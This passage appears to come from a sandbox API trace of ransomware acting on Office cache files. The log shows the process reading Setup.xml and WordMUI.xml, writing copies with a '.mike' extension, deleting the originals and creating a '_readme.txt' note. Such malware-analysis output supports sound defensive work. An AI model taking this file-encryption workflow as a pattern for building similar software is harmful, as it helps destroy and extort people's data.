ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc967850, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x29c6dbd, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordLR.cab", cAlternateFileName="")) returned 1 [0040.072] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x267e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordMUI.msi", cAlternateFileName="")) returned 1 [0040.072] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordMUI.xml", cAlternateFileName="")) returned 1 [0040.072] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.072] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.072] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.072] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0040.072] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.073] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.073] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.073] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0040.073] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.073] GetFileType (hFile=0x264) returned 0x1 [0040.073] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0040.073] GetFileType (hFile=0x264) returned 0x1 [0040.073] CloseHandle (hObject=0x264) returned 1 [0040.073] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.073] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.073] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0040.073] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0040.073] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0040.073] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.074] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.074] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x22311a0 | out: lpFileInformation=0x22311a0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978)) returned 1 [0040.074] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.074] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.074] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.074] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x22314bc | out: lpFileInformation=0x22314bc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978)) returned 1 [0040.074] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.074] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.074] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.074] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.074] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.074] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.074] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.074] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.074] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.074] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0040.075] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0040.075] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.075] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.081] GetFileType (hFile=0x264) returned 0x1 [0040.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.082] GetFileType (hFile=0x264) returned 0x1 [0040.082] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0040.082] WriteFile (in: hFile=0x264, lpBuffer=0x2232338*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x2232338*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0040.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0040.083] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2231e40 | out: lpFileInformation=0x2231e40*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978)) returned 1 [0040.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0040.083] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0040.083] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.083] GetFileType (hFile=0x264) returned 0x1 [0040.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0040.083] GetFileType (hFile=0x264) returned 0x1 [0040.083] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0040.083] ReadFile (in: hFile=0x264, lpBuffer=0x2233460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x2233460*, lpNumberOfBytesRead=0x2af110*=0x978, lpOverlapped=0x0) returned 1 [0040.085] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.085] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.085] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.085] GetFileType (hFile=0x264) returned 0x1 [0040.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.085] GetFileType (hFile=0x264) returned 0x1 [0040.085] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0040.085] WriteFile (in: hFile=0x264, lpBuffer=0x2239bec*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x2239bec*, lpNumberOfBytesWritten=0x2af104*=0x980, lpOverlapped=0x0) returned 1 [0040.086] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0040.086] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.086] GetFileType (hFile=0x264) returned 0x1 [0040.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0040.086] GetFileType (hFile=0x264) returned 0x1 [0040.087] WriteFile (in: hFile=0x264, lpBuffer=0x223ce14*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x223ce14*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0040.087] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.087] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.087] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2166b00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2166b00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe218cc60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xba0)) returned 1 [0040.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.087] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.087] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.087] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x223e590 | out: lpFileInformation=0x223e590*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2166b00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2166b00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe218cc60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xba0)) returned 1 [0040.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.088] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.088] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0040.088] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0040.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0040.089] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0040.090] GetFileType (hFile=0x264) returned 0x1 [0040.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0040.090] GetFileType (hFile=0x264) returned 0x1 [0040.090] WriteFile (in: hFile=0x264, lpBuffer=0x2240274*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x2240274*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0040.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0040.091] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.091] GetFileType (hFile=0x264) returned 0x1 [0040.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0040.091] GetFileType (hFile=0x264) returned 0x1 [0040.091] CloseHandle (hObject=0x264) returned 1 [0040.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0040.091] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0040.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.092] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.092] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.092] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.092] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0040.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0040.092] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.092] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.093] GetFileType (hFile=0x264) returned 0x1 [0040.093] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.093] GetFileType (hFile=0x264) returned 0x1 [0040.093] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0040.093] WriteFile (in: hFile=0x264, lpBuffer=0x2247798*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x2247798*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0040.094] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0040.094] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0040.094] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0040.094] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.094] GetFileType (hFile=0x264) returned 0x1 [0040.094] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0040.094] GetFileType (hFile=0x264) returned 0x1 [0040.094] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0040.094] ReadFile (in: hFile=0x264, lpBuffer=0x22488c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x22488c8*, lpNumberOfBytesRead=0x2af110*=0x708, lpOverlapped=0x0) returned 1 [0040.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.096] CreateFileW (lpFileName="C:\\MSOCache\\All 